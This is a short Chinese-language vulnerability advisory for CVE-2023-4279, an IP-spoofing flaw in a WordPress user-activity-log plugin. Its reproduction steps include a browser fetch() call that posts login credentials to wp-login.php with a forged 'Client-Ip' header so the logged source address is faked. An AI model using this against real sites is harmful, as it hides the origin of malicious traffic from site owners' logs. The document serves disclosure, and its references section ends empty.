CVE ID: CVE-2023-4279
漏洞类型: IP 地址欺骗
描述: 该插件从可能不可信的请求头中获取客户端 IP 地址,攻击者可以操纵该值,从而隐藏恶意流量的来源。
复现步骤:
1. 在用户活动日志 > 设置中,启用“记录用户的 IP 地址”选项并保存设置。
2. 在浏览器中运行以下代码,并注意后端显示的 IP 地址已被伪造。
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
参考: